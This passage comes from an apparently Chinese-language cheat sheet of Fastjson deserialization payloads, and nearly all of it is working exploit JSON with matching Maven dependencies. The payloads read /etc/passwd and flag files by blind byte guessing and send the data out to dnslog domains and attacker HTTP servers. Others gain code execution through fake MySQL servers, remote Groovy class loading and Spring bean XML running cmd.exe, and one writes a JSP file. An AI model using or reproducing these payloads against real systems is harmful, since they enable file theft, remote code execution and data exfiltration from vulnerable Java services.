| } 645 | ``` 646 | 647 | ## Commons IO 2.x 读文件 648 | ### 利用报错信息逐个猜解(类似盲注) 649 | byte 十进制ASCII码 650 | ```json 651 | { 652 | "abc": { 653 | "@type": "java.lang.AutoCloseable", 654 | "@type": "org.apache.commons.io.input.BOMInputStream", 655 | "delegate": { 656 | "@type": "org.apache.commons.io.input.ReaderInputStream", 657 | "reader": { 658 | "@type": "jdk.nashorn.api.scripting.URLReader", 659 | "url": "file:///etc/passwd" 660 | }, 661 | "charsetName": "UTF-8", 662 | "bufferSize": 1024 663 | }, 664 | "boms": [ 665 | { 666 | "charsetName": "UTF-8", 667 | "bytes": [ 668 | 60,101 669 | ] 670 | } 671 | ] 672 | }, 673 | "address": { 674 | "$ref": "$.abc.BOM" 675 | } 676 | } 677 | ``` 678 | 679 | ```xml 680 | 681 | commons-io 682 | commons-io 683 | 2.1 684 | 685 | ``` 686 | 687 | 文件内容为 test,对应ascii[116,101,115,116] 688 | ```json 689 | # 逐位填入bytes,可利用二分法爆破 690 | # 正确则返回base64结果 691 | {"abc":{"bOM":{"bytes":"dGVzdA==","charsetName":"UTF-8"},"bOMCharsetName":"UTF-8"},"address":{"$ref":"$.abc.bOM"}} 692 | # 错误 693 | {"abc":{}} 694 | ``` 695 | 696 | 697 | 698 | ### 利用类型不一致报错 699 | ```json 700 | { 701 | "abc": { 702 | "@type": "java.lang.AutoCloseable", 703 | "@type": "org.apache.commons.io.input.BOMInputStream", 704 | "delegate": { 705 | "@type": "org.apache.commons.io.input.ReaderInputStream", 706 | "reader": { 707 | "@type": "jdk.nashorn.api.scripting.URLReader", 708 | "url": "file:///etc/passwd" 709 | }, 710 | "charsetName": "UTF-8", 711 | "bufferSize": 1024 712 | }, 713 | "boms": [ 714 | { 715 | "charsetName": "UTF-8", 716 | "bytes": [ 717 | 60,101 718 | ] 719 | } 720 | ] 721 | }, 722 | "address": { 723 | "@type": "java.lang.AutoCloseable", 724 | "@type": "org.apache.commons.io.input.CharSequenceReader", 725 | "charSequence": { 726 | "@type": "java.lang.String"{"$ref":"$.abc.BOM[0]"}, 727 | "start": 0, 728 | "end": 0 729 | } 730 | } 731 | } 732 | ``` 733 | 734 | 735 | ### 无回显 对比正确时请求dnslog 736 | 
https://tyskill.github.io/posts/fastjson%E6%97%A0%E5%9B%9E%E6%98%BE%E8%AF%BB%E6%96%87%E4%BB%B6/ 737 | ```json 738 | { 739 | "abc":{"@type": "java.lang.AutoCloseable", 740 | "@type": "org.apache.commons.io.input.BOMInputStream", 741 | "delegate": { 742 | "@type": "org.apache.commons.io.input.ReaderInputStream", 743 | "reader": { 744 | "@type": "jdk.nashorn.api.scripting.URLReader", 745 | "url": "file:///etc/passwd" 746 | }, 747 | "charsetName": "UTF-8", 748 | "bufferSize": 1024 749 | },"boms": [ 750 | { 751 | "@type": "org.apache.commons.io.ByteOrderMark", 752 | "charsetName": "UTF-8", 753 | "bytes": [116,101,115,116] 754 | } 755 | ] 756 | }, 757 | "address": { 758 | "@type": "java.lang.AutoCloseable", 759 | "@type": "org.apache.commons.io.input.BOMInputStream", 760 | "delegate": { 761 | "@type": "org.apache.commons.io.input.ReaderInputStream", 762 | "reader": { 763 | "@type": "jdk.nashorn.api.scripting.URLReader", 764 | "url": "http://fj.ppp.dnslog.pw" 765 | }, 766 | "charsetName": "UTF-8", 767 | "bufferSize": 1024 768 | }, 769 | "boms": [{"$ref":"$.abc.BOM[0]"}] 770 | }, 771 | "xxx":{"$ref":"$.address.BOM[0]"} 772 | } 773 | ``` 774 | 775 | ### 无回显 对比不正确时请求dnslog 很麻烦 776 | ```json 777 | { 778 | "abc":{"@type": "java.lang.AutoCloseable", 779 | "@type": "org.apache.commons.io.input.BOMInputStream", 780 | "delegate": {"@type": "org.apache.commons.io.input.ReaderInputStream", 781 | "reader": { "@type": "jdk.nashorn.api.scripting.URLReader", 782 | "url": "file:///etc/passwd" 783 | }, 784 | "charsetName": "UTF-8", 785 | "bufferSize": 1024 786 | },"boms": [ 787 | { 788 | "@type": "org.apache.commons.io.ByteOrderMark", 789 | "charsetName": "UTF-8", 790 | "bytes": [ 791 | 48, 792 | ] 793 | } 794 | ] 795 | }, 796 | "address" : { 797 | "@type": "java.lang.AutoCloseable", 798 | "@type":"org.apache.commons.io.input.CharSequenceReader", 799 | "charSequence": { 800 | "@type": "java.lang.String"{"$ref":"$.abc.BOM[0]" 801 | }, 802 | "start": 0, 803 | "end": 0 804 | }, 805 | 
"xxx":{{"@type":"java.net.Inet4Address","val":"cnm.awm6.hyuga.icu"}:"xx"} 806 | } 807 | 808 | ``` 809 | 810 | ## Mysql connect RCE 811 | ### Fake Server 812 | > https://github.com/fnmsd/MySQL_Fake_Server 813 | 814 | ```xml 815 | 816 | mysql 817 | mysql-connector-java 818 | 5.1.11 819 | 820 | ``` 821 | 822 | #### [5.1.11, 5.1.48] 823 | ```json 824 | { 825 | "@type": "java.lang.AutoCloseable", 826 | "@type": "com.mysql.jdbc.JDBC4Connection", 827 | "hostToConnectTo": "127.0.0.1", 828 | "portToConnectTo": 3306, 829 | "info": { 830 | "user": "fileread_/tmp/flag", 831 | "password": "pass", 832 | "maxAllowedPacket": "655360", 833 | "statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor", 834 | "autoDeserialize": "true", 835 | "NUM_HOSTS": "1" 836 | }, 837 | "databaseToConnectTo": "dbname", 838 | "url": "" 839 | } 840 | ``` 841 | 842 | #### [6.0.2, 6.0.6] 843 | ```json 844 | { 845 | "@type": "java.lang.AutoCloseable", 846 | "@type": "com.mysql.cj.jdbc.ha.LoadBalancedMySQLConnection", 847 | "proxy": { 848 | "connectionString": { 849 | "url": "jdbc:mysql://localhost:3306/test?allowLoadLocalInfile=true&autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_CommonsCollections5_/System/Applications/Calculator.app/Contents/MacOS/Calculator" 850 | } 851 | } 852 | } 853 | ``` 854 | 855 | #### [8.0.7-dmr, 8.0.19] 856 | ```json 857 | { 858 | "@type": "java.lang.AutoCloseable", 859 | "@type": "com.mysql.cj.jdbc.ha.ReplicationMySQLConnection", 860 | "proxy": { 861 | "@type": "com.mysql.cj.jdbc.ha.LoadBalancedConnectionProxy", 862 | "connectionUrl": { 863 | "@type": "com.mysql.cj.conf.url.ReplicationConnectionUrl", 864 | "masters": [ 865 | { 866 | "host": "127.0.0.1" 867 | } 868 | ], 869 | "slaves": [], 870 | "properties": { 871 | "host": "127.0.0.1", 872 | "user": "yso_CommonsCollections5_open -a Calculator.app", 873 | "dbname": "dbname", 874 | "password": "pass", 875 | "queryInterceptors": 
"com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor", 876 | "autoDeserialize": "true", 877 | "allowLoadLocalInfile": "true" 878 | } 879 | } 880 | } 881 | } 882 | ``` 883 | 884 | # fastjson <= 1.2.80 反序列化代码执行 885 | ## groovy RCE 886 | ```xml 887 | 888 | org.codehaus.groovy 889 | groovy 890 | 3.0.9 891 | 892 | ``` 893 | 894 | 新建项目 895 | src/main/java/org/example/GroovyPoc.java 896 | ```java 897 | @GroovyASTTransformation(phase = CompilePhase.CONVERSION) 898 | public class GroovyPoc implements ASTTransformation { 899 | public GroovyPoc(){ 900 | try{ 901 | Runtime.getRuntime().exec("/System/Applications/Calculator.app/Contents/MacOS/Calculator"); 902 | }catch (Exception ex){ 903 | 904 | } 905 | } 906 | 907 | @Override 908 | public void visit(ASTNode[] astNodes, SourceUnit sourceUnit) { 909 | 910 | } 911 | } 912 | ``` 913 | src/main/resources/META-INF/services/org.codehaus.groovy.transform.ASTTransformation 914 | 写入恶意类 915 | ``` 916 | org.example.GroovyPoc 917 | ``` 918 | 919 | ``` 920 | mvn install 921 | 在classes目录开启http服务 922 | ``` 923 | 924 | poc1 925 | ```json 926 | { 927 | "@type":"java.lang.Exception", 928 | "@type":"org.codehaus.groovy.control.CompilationFailedException", 929 | "unit":{} 930 | } 931 | ``` 932 | poc2 933 | ```json 934 | { 935 | "@type":"org.codehaus.groovy.control.ProcessingUnit", 936 | "@type":"org.codehaus.groovy.tools.javac.JavaStubCompilationUnit", 937 | "config":{ 938 | "@type":"org.codehaus.groovy.control.CompilerConfiguration", 939 | "classpathList":"http://192.168.16.132:1234/" 940 | } 941 | } 942 | ``` 943 | 944 | ## jython 945 | [参考猎鹰](https://mp.weixin.qq.com/s/m2U4zNkLCJvO3l1jChzeFw) 946 | ```xml 947 | 948 | 949 | org.python 950 | jython 951 | 2.7.0 952 | 953 | ``` 954 | ### psql 955 | https://mp.weixin.qq.com/s/m2U4zNkLCJvO3l1jChzeFw 956 | ```xml 957 | 958 | org.postgresql 959 | postgresql 960 | 42.3.1 961 | 962 | ``` 963 | 964 | ```json 965 | { 966 | "a":{ 967 | "@type":"java.lang.Exception", 968 | 
"@type":"org.python.antlr.ParseException", 969 | }, 970 | "b":{ 971 | "@type":"java.lang.Class", 972 | "val":{"@type":"java.lang.String"{"@type":"java.util.Locale","val":{"@type":"com.alibaba.fastjson.JSONObject",{"@type":"java.lang.String""@type":"org.python.antlr.ParseException", 973 | "type":{}}} 974 | }, 975 | "c":{ 976 | "@type":"org.python.core.PyObject", 977 | "@type":"com.ziclix.python.sql.PyConnection", 978 | "connection":{ 979 | "@type":"org.postgresql.jdbc.PgConnection", 980 | "hostSpecs":[{"host":"127.0.0.1","port":2333}], 981 | "user":"user", 982 | "database":"test", 983 | "info":{ 984 | "socketFactory":"org.springframework.context.support.ClassPathXmlApplicationContext", 985 | "socketFactoryArg":"http://127.0.0.1:1234/exp.xml" 986 | }, 987 | "url":"" 988 | } 989 | } 990 | } 991 | ``` 992 | 993 | 任意spring bean xml exp,其他payload可[参考](https://gv7.me/articles/2021/some-extensions-of-spring-bean-rce-under-weblogic/) 994 | exp.xml - jndi 995 | ```xml 996 | 997 | 1001 | 1002 | 1003 | 1004 | 1005 | ``` 1006 | 1007 | exp.xml - cmd 1008 | ```xml 1009 | 1010 | 1014 | 1015 | 1016 | 1017 | cmd.exe 1018 | /c 1019 | 1020 | 1021 | 1022 | 1023 | 1024 | 1025 | ``` 1026 | 1027 | ### mysql 1028 | ```xml 1029 | 1030 | mysql 1031 | mysql-connector-java 1032 | 5.1.11 1033 | 1034 | ``` 1035 | 1036 | #### [5.1.11, 5.1.48] 1037 | ```json 1038 | { 1039 | "a":{ 1040 | "@type":"java.lang.Exception", 1041 | "@type":"org.python.antlr.ParseException", 1042 | }, 1043 | "b":{ 1044 | "@type":"java.lang.Class", 1045 | "val":{"@type":"java.lang.String"{"@type":"java.util.Locale","val":{"@type":"com.alibaba.fastjson.JSONObject",{"@type":"java.lang.String""@type":"org.python.antlr.ParseException", 1046 | "type":{}}} 1047 | }, 1048 | "c":{ 1049 | "@type":"org.python.core.PyObject", 1050 | "@type":"com.ziclix.python.sql.PyConnection", 1051 | "connection":{ 1052 | "@type": "com.mysql.jdbc.JDBC4Connection", 1053 | "hostToConnectTo": "127.0.0.1", 1054 | "portToConnectTo": 3306, 1055 | "info": { 
1056 | "user": "fileread_/tmp/flag", 1057 | "password": "pass", 1058 | "statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor", 1059 | "autoDeserialize": "true", 1060 | "NUM_HOSTS": "1", 1061 | "maxAllowedPacket":"655360" 1062 | }, 1063 | "databaseToConnectTo": "dbname", 1064 | "url": "" 1065 | } 1066 | } 1067 | } 1068 | 1069 | ``` 1070 | 1071 | #### [6.0.2, 6.0.6] 1072 | ```json 1073 | { 1074 | "a":{ 1075 | "@type":"java.lang.Exception", 1076 | "@type":"org.python.antlr.ParseException", 1077 | }, 1078 | "b":{ 1079 | "@type":"java.lang.Class", 1080 | "val":{"@type":"java.lang.String"{"@type":"java.util.Locale","val":{"@type":"com.alibaba.fastjson.JSONObject",{"@type":"java.lang.String""@type":"org.python.antlr.ParseException", 1081 | "type":{}}} 1082 | }, 1083 | "c":{ 1084 | "@type":"org.python.core.PyObject", 1085 | "@type":"com.ziclix.python.sql.PyConnection", 1086 | "connection":{ 1087 | "@type":"com.mysql.cj.jdbc.ha.LoadBalancedMySQLConnection", 1088 | "proxy": { 1089 | "connectionString": { 1090 | "url": "jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=fileread_/tmp/flag" 1091 | } 1092 | } 1093 | } 1094 | } 1095 | } 1096 | ``` 1097 | 1098 | #### [8.0.7-dmr, 8.0.19] 1099 | ```json 1100 | { 1101 | "a":{ 1102 | "@type":"java.lang.Exception", 1103 | "@type":"org.python.antlr.ParseException", 1104 | }, 1105 | "b":{ 1106 | "@type":"java.lang.Class", 1107 | "val":{"@type":"java.lang.String"{"@type":"java.util.Locale","val":{"@type":"com.alibaba.fastjson.JSONObject",{"@type":"java.lang.String""@type":"org.python.antlr.ParseException", 1108 | "type":{}}} 1109 | }, 1110 | "c":{ 1111 | "@type":"org.python.core.PyObject", 1112 | "@type":"com.ziclix.python.sql.PyConnection", 1113 | "connection":{ 1114 | "@type":"com.mysql.cj.jdbc.ha.ReplicationMySQLConnection", 1115 | "proxy":{ 1116 | "@type":"com.mysql.cj.jdbc.ha.LoadBalancedConnectionProxy", 1117 | 
"connectionUrl":{ 1118 | "@type":"com.mysql.cj.conf.url.ReplicationConnectionUrl", 1119 | "masters":[{"host":"127.0.0.1"}], 1120 | "slaves":[], 1121 | "properties":{ 1122 | "host":"127.0.0.1", 1123 | "port":"3306", 1124 | "connectionAttributes":"t:cb32", 1125 | "user":"fileread_/tmp/flag", 1126 | "dname":"dname", 1127 | "password":"password", 1128 | "queryInterceptors":"com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor", 1129 | "autoDeserialize":"true", 1130 | "allowLoadLocalInfile":"true" 1131 | } 1132 | } 1133 | } 1134 | } 1135 | } 1136 | } 1137 | ``` 1138 | 1139 | ## AspectJ Tools (Compiler)文件读取 1140 | ```xml 1141 | 1142 | org.aspectj 1143 | aspectjtools 1144 | 1.9.8 1145 | 1146 | ``` 1147 | 1.7.0<=version<=1.9.9 1148 | 1149 | poc需要分三次打,web项目可用 1150 | poc1 1151 | ```json 1152 | { 1153 | "@type":"java.lang.Exception", 1154 | "@type":"org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException" 1155 | } 1156 | ``` 1157 | poc2 1158 | ```json 1159 | { 1160 | "@type":"java.lang.Class", 1161 | "val":{ 1162 | "@type":"java.lang.String"{ 1163 | "@type":"java.util.Locale", 1164 | "val":{ 1165 | "@type":"com.alibaba.fastjson.JSONObject",{ 1166 | "@type":"java.lang.String" 1167 | "@type":"org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException", 1168 | "newAnnotationProcessorUnits":[{}] 1169 | } 1170 | } 1171 | } 1172 | ``` 1173 | 1174 | 根据利用环境有多种poc3 1175 | ### 有回显 1176 | ```json 1177 | { 1178 | "x":{ 1179 | "@type":"org.aspectj.org.eclipse.jdt.internal.compiler.env.ICompilationUnit", 1180 | "@type":"org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit", 1181 | "fileName":"/etc/passwd" 1182 | } 1183 | } 1184 | ``` 1185 | ### 报错回显 1186 | ```json 1187 | { 1188 | "@type": "java.lang.Character" { 1189 | "C": { 1190 | "x": { 1191 | "@type": "org.aspectj.org.eclipse.jdt.internal.compiler.env.ICompilationUnit", 1192 | "@type": "org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit", 1193 | "fileName": 
"/etc/passwd" 1194 | } 1195 | } 1196 | } 1197 | } 1198 | ``` 1199 | 1200 | ### dnslog 1201 | 受限于字符,带出失败 1202 | ```json 1203 | { 1204 | "@type":"java.net.Inet4Address", 1205 | "val":{ 1206 | "@type":"java.lang.String"{ 1207 | "@type":"java.util.Locale", 1208 | "val":{ 1209 | "@type":"com.alibaba.fastjson.JSONObject",{ 1210 | "@type":"java.lang.String" 1211 | "@type":"java.util.Locale", 1212 | "country":"fj.ppp.dnslog.pw", 1213 | "language":{ 1214 | "@type":"java.lang.String"{ 1215 | "x":{ 1216 | "@type": "org.aspectj.org.eclipse.jdt.internal.compiler.env.ICompilationUnit", 1217 | "@type": "org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit", 1218 | "fileName": "/etc/passwd" 1219 | } 1220 | } 1221 | } 1222 | } 1223 | } 1224 | } 1225 | } 1226 | } 1227 | ``` 1228 | 1229 | ## AspectJ + cc + ognl http带出文件 1230 | ```xml 1231 | 1232 | ognl 1233 | ognl 1234 | 3.2.21 1235 | 1236 | 1237 | commons-io 1238 | commons-io 1239 | 2.2 1240 | 1241 | 1242 | 1243 | org.aspectj 1244 | aspectjtools 1245 | 1.9.8 1246 | 1247 | ``` 1248 | 1249 | poc1 1250 | ```json 1251 | [{ 1252 | "@type": "java.lang.Exception", 1253 | "@type": "org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException" 1254 | }, 1255 | { 1256 | "@type": "java.lang.Class", 1257 | "val": { 1258 | "@type": "java.lang.String" { 1259 | "@type": "java.util.Locale", 1260 | "val": { 1261 | "@type": "com.alibaba.fastjson.JSONObject", 1262 | { 1263 | "@type": "java.lang.String" 1264 | "@type": "org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException", 1265 | "newAnnotationProcessorUnits": [{}] 1266 | } 1267 | } 1268 | }, 1269 | { 1270 | "x": { 1271 | "@type": "org.aspectj.org.eclipse.jdt.internal.compiler.env.ICompilationUnit", 1272 | "@type": "org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit", 1273 | "fileName": "aaa" 1274 | } 1275 | }] 1276 | ``` 1277 | 1278 | poc2 1279 | ```json 1280 | { 1281 | "su14": { 1282 | "@type": "java.lang.Exception", 1283 | 
"@type": "ognl.OgnlException" 1284 | }, 1285 | "su15": { 1286 | "@type": "java.lang.Class", 1287 | "val": { 1288 | "@type": "com.alibaba.fastjson.JSONObject", 1289 | { 1290 | "@type": "java.lang.String" 1291 | "@type": "ognl.OgnlException", 1292 | "_evaluation": "" 1293 | } 1294 | }, 1295 | "su16": { 1296 | "@type": "ognl.Evaluation", 1297 | "node": { 1298 | "@type": "ognl.ASTMethod", 1299 | "p": { 1300 | "@type": "ognl.OgnlParser", 1301 | "stream": { 1302 | "@type": "org.apache.commons.io.input.BOMInputStream", 1303 | "delegate": { 1304 | "@type": "org.apache.commons.io.input.ReaderInputStream", 1305 | "reader": { 1306 | "@type": "jdk.nashorn.api.scripting.URLReader", 1307 | "url": { 1308 | "@type": "java.lang.String" { 1309 | "@type": "java.util.Locale", 1310 | "val": { 1311 | "@type": "com.alibaba.fastjson.JSONObject", 1312 | { 1313 | "@type": "java.lang.String" 1314 | "@type": "java.util.Locale", 1315 | "language": "http://192.168.66.136:1234/", 1316 | "country": { 1317 | "@type": "java.lang.String" [{ 1318 | "@type": "org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit", 1319 | "fileName": "tmp" 1320 | }] 1321 | 1322 | } 1323 | } 1324 | }, 1325 | "charsetName": "UTF-8", 1326 | "bufferSize": 1024 1327 | }, 1328 | "boms": [{ 1329 | "@type": "org.apache.commons.io.ByteOrderMark", 1330 | "charsetName": "UTF-8", 1331 | "bytes": [ 1332 | 0 1333 | ] 1334 | }] 1335 | } 1336 | } 1337 | } 1338 | }, 1339 | "su17": { 1340 | "$ref": "$.su16.node.p.stream" 1341 | }, 1342 | "su18": { 1343 | "$ref": "$.su17.bOM.bytes" 1344 | } 1345 | } 1346 | ``` 1347 | 带出文件 1348 | ``` 1349 | ::ffff:192.168.66.136 - - [17/Oct/2022 10:37:49] "GET /_[{"CONTENTS":"FLAG{THIS IS FLAG}","FILENAME":"TMP","MAINTYPENAME":"TMP"}] HTTP/1.1" 400 - 1350 | ``` 1351 | 1352 | ## ognl + io读文件 1353 | ### 利用报错回显 jdk8 1354 | 类似1.2.68,但实际测试起来效果不太理想 1355 | ```xml 1356 | 1357 | ognl 1358 | ognl 1359 | 3.2.21 1360 | 1361 | 1362 | commons-io 1363 | commons-io 1364 | 2.2 1365 | 1366 | ``` 1367 | 1368 | 
```json 1369 | { 1370 | "su14": { 1371 | "@type": "java.lang.Exception", 1372 | "@type": "ognl.OgnlException" 1373 | }, 1374 | "su15": { 1375 | "@type": "java.lang.Class", 1376 | "val": { 1377 | "@type": "com.alibaba.fastjson.JSONObject", 1378 | { 1379 | "@type": "java.lang.String" 1380 | "@type": "ognl.OgnlException", 1381 | "_evaluation": "" 1382 | } 1383 | }, 1384 | "su16": { 1385 | "@type": "ognl.Evaluation", 1386 | "node": { 1387 | "@type": "ognl.ASTMethod", 1388 | "p": { 1389 | "@type": "ognl.OgnlParser", 1390 | "stream": { 1391 | "@type": "org.apache.commons.io.input.BOMInputStream", 1392 | "delegate": { 1393 | "@type": "org.apache.commons.io.input.ReaderInputStream", 1394 | "reader": { 1395 | "@type": "jdk.nashorn.api.scripting.URLReader", 1396 | "url": "file://tmp" 1397 | }, 1398 | "charsetName": "UTF-8", 1399 | "bufferSize": 1024 1400 | }, 1401 | "boms": [{ 1402 | "@type": "org.apache.commons.io.ByteOrderMark", 1403 | "charsetName": "UTF-8", 1404 | "bytes": [ 1405 | 116,101,115,116 1406 | ] 1407 | }] 1408 | } 1409 | } 1410 | } 1411 | }, 1412 | "su17": { 1413 | "$ref": "$.su16.node.p.stream" 1414 | }, 1415 | "su18": { 1416 | "$ref": "$.su17.bOM.bytes" 1417 | } 1418 | } 1419 | ``` 1420 | 1421 | ### 利用报错布尔 1422 | ```json 1423 | [{"su15":{"@type":"java.lang.Exception","@type":"ognl.OgnlException",}},{"su16":{"@type":"java.lang.Class","val":{ "@type":"com.alibaba.fastjson.JSONObject",{ "@type":"java.lang.String" "@type":"ognl.OgnlException", "_evaluation":""}}}, 1424 | {"su17":{ "@type": "ognl.Evaluation", "node": { "@type": "ognl.ASTMethod", "p": { "@type": "ognl.OgnlParser", "stream": 1425 | { 1426 | "@type": "org.apache.commons.io.input.BOMInputStream", 1427 | "delegate": { 1428 | "@type": "org.apache.commons.io.input.ReaderInputStream", 1429 | "reader": { 1430 | "@type": "jdk.nashorn.api.scripting.URLReader", 1431 | "url": "file://tmp" 1432 | }, 1433 | "charsetName": "UTF-8", 1434 | "bufferSize": 1024 1435 | },"boms": [{"@type": 
"org.apache.commons.io.ByteOrderMark", "charsetName": "UTF-8", "bytes": [ 1436 | 116,101,115,116]}] 1437 | }}}}},{"su18" : {"$ref":"$[2].su17.node.p.stream"}},{"su19":{ 1438 | "$ref":"$[3].su18.bOM.bytes"}},{"su20":{ "@type": "ognl.Evaluation", "node": { "@type": "ognl.ASTMethod", "p": { "@type": "ognl.OgnlParser", "stream":{ "@type": "org.apache.commons.io.input.BOMInputStream", "delegate": { "@type": "org.apache.commons.io.input.ReaderInputStream", "reader":{"@type":"org.apache.commons.io.input.CharSequenceReader", 1439 | "charSequence": {"@type": "java.lang.String"{"$ref":"$[4].su19"},"start": 0,"end": 0}, "charsetName": "UTF-8", "bufferSize": 1024},"boms": [{"@type": "org.apache.commons.io.ByteOrderMark", "charsetName": "UTF-8", "bytes": [1]}]}}}}},{"su21" : {"$ref":"$[5].su20.node.p.stream"}}] 1440 | ``` 1441 | 1442 | ### http报错回显 1443 | ```json 1444 | [{"su15":{"@type":"java.lang.Exception","@type":"ognl.OgnlException",}},{"su16":{"@type":"java.lang.Class","val":{ "@type":"com.alibaba.fastjson.JSONObject",{ "@type":"java.lang.String" "@type":"ognl.OgnlException", "_evaluation":""}}}, 1445 | {"su17":{ "@type": "ognl.Evaluation", "node": { "@type": "ognl.ASTMethod", "p": { "@type": "ognl.OgnlParser", "stream": 1446 | { 1447 | "@type": "org.apache.commons.io.input.BOMInputStream", 1448 | "delegate": { 1449 | "@type": "org.apache.commons.io.input.ReaderInputStream", 1450 | "reader": { 1451 | "@type": "jdk.nashorn.api.scripting.URLReader", 1452 | "url": "file://tmp" 1453 | }, 1454 | "charsetName": "UTF-8", 1455 | "bufferSize": 1024 1456 | },"boms": [{"@type": "org.apache.commons.io.ByteOrderMark", "charsetName": "UTF-8", "bytes": [ 1457 | 98]}] 1458 | }}}}},{"su18" : {"$ref":"$[2].su17.node.p.stream"}},{"su19":{ 1459 | "$ref":"$[3].su18.bOM.bytes"}},{"su22":{ "@type": "ognl.Evaluation", "node": { "@type": "ognl.ASTMethod", "p": { "@type": "ognl.OgnlParser", "stream":{ "@type": "org.apache.commons.io.input.BOMInputStream", "delegate": { "@type": 
"org.apache.commons.io.input.ReaderInputStream", "reader":{"@type":"jdk.nashorn.api.scripting.URLReader","url":{"@type":"java.lang.String"{"@type":"java.net.URL","val":{"@type":"java.lang.String"{"@type":"java.util.Locale","val":{"@type":"com.alibaba.fastjson.JSONObject",{"@type": "java.lang.String""@type":"java.util.Locale","language":"http://192.168.66.136:1234/","country":{"@type":"java.lang.String"{"$ref":"115"}}}}}, "charsetName": "UTF-8", "bufferSize": 1024},"boms": [{"@type": "org.apache.commons.io.ByteOrderMark", "charsetName": "UTF-8", "bytes": [1]}]}}}}},{"su23" : {"$ref":"$[5].su22.node.p.stream"}},{"su20":{ "@type": "ognl.Evaluation", "node": { "@type": "ognl.ASTMethod", "p": { "@type": "ognl.OgnlParser", "stream":{ "@type": "org.apache.commons.io.input.BOMInputStream", "delegate": { "@type": "org.apache.commons.io.input.ReaderInputStream", "reader":{"@type":"org.apache.commons.io.input.CharSequenceReader", 1460 | "charSequence": {"@type": "java.lang.String"{"$ref":"$[4].su19"},"start": 0,"end": 0}, "charsetName": "UTF-8", "bufferSize": 1024},"boms": [{"@type": "org.apache.commons.io.ByteOrderMark", "charsetName": "UTF-8", "bytes": [1]}]}}}}},{"su21" : {"$ref":"$[7].su20.node.p.stream"}}] 1461 | ``` 1462 | 1463 | ## ognl + io 写文件(链子有问题,还要调一下) 1464 | ### cc低版本 2.0 -2.6 1465 | ```xml 1466 | 1467 | ognl 1468 | ognl 1469 | 3.2.21 1470 | 1471 | 1472 | commons-io 1473 | commons-io 1474 | 2.2 1475 | 1476 | ``` 1477 | 1478 | ```json 1479 | { 1480 | "su14": { 1481 | "@type": "java.lang.Exception", 1482 | "@type": "ognl.OgnlException" 1483 | }, 1484 | "su15": { 1485 | "@type": "java.lang.Class", 1486 | "val": { 1487 | "@type": "com.alibaba.fastjson.JSONObject", 1488 | { 1489 | "@type": "java.lang.String" 1490 | "@type": "ognl.OgnlException", 1491 | "_evaluation": "" 1492 | } 1493 | }, 1494 | "su16": { 1495 | "@type": "ognl.Evaluation", 1496 | "node": { 1497 | "@type": "ognl.ASTMethod", 1498 | "p": { 1499 | "@type": "ognl.OgnlParser", 1500 | "stream": { 1501 | 
"@type": "org.apache.commons.io.input.BOMInputStream", 1502 | "delegate": { 1503 | "@type": "org.apache.commons.io.input.ReaderInputStream", 1504 | "reader": { 1505 | "@type":"org.apache.commons.io.input.XmlStreamReader", 1506 | "is":{ 1507 | "@type":"org.apache.commons.io.input.TeeInputStream", 1508 | "input":{ 1509 | "@type":"org.apache.commons.io.input.ReaderInputStream", 1510 | "reader":{ 1511 | "@type":"org.apache.commons.io.input.CharSequenceReader", 1512 | "charSequence":{"@type":"java.lang.String""test8200个a" 1513 | }, 1514 | "charsetName":"UTF-8", 1515 | "bufferSize":1024 1516 | }, 1517 | "branch":{ 1518 | "@type":"org.apache.commons.io.output.WriterOutputStream", 1519 | "writer":{ 1520 | "@type":"org.apache.commons.io.output.FileWriterWithEncoding", 1521 | "file":"1.jsp", 1522 | "encoding":"UTF-8", 1523 | "append": false 1524 | }, 1525 | "charsetName":"UTF-8", 1526 | "bufferSize": 1024, 1527 | "writeImmediately": true 1528 | }, 1529 | "closeBranch": true 1530 | }, 1531 | "httpContentType":"text/xml", 1532 | "lenient":false, 1533 | "defaultEncoding":"UTF-8" 1534 | }, 1535 | "charsetName": "UTF-8", 1536 | "bufferSize": 1024 1537 | }, 1538 | "boms": [{ 1539 | "@type": "org.apache.commons.io.ByteOrderMark", 1540 | "charsetName": "UTF-8", 1541 | "bytes": [ 1542 | 36,82 1543 | ] 1544 | }] 1545 | } 1546 | } 1547 | } 1548 | }, 1549 | "su17": { 1550 | "@type": "ognl.Evaluation", 1551 | "node": { 1552 | "@type": "ognl.ASTMethod", 1553 | "p": { 1554 | "@type": "ognl.OgnlParser", 1555 | "stream": { 1556 | "@type": "org.apache.commons.io.input.BOMInputStream", 1557 | "delegate": { 1558 | "@type": "org.apache.commons.io.input.ReaderInputStream", 1559 | "reader": { 1560 | "@type":"org.apache.commons.io.input.XmlStreamReader", 1561 | "is":{ 1562 | "@type":"org.apache.commons.io.input.TeeInputStream", 1563 | "input":{"$ref": "$.su16.node.p.stream.delegate.reader.is.input"}, 1564 | "branch":{"$ref": "$.su16.node.p.stream.delegate.reader.is.branch"}, 1565 | "closeBranch": 
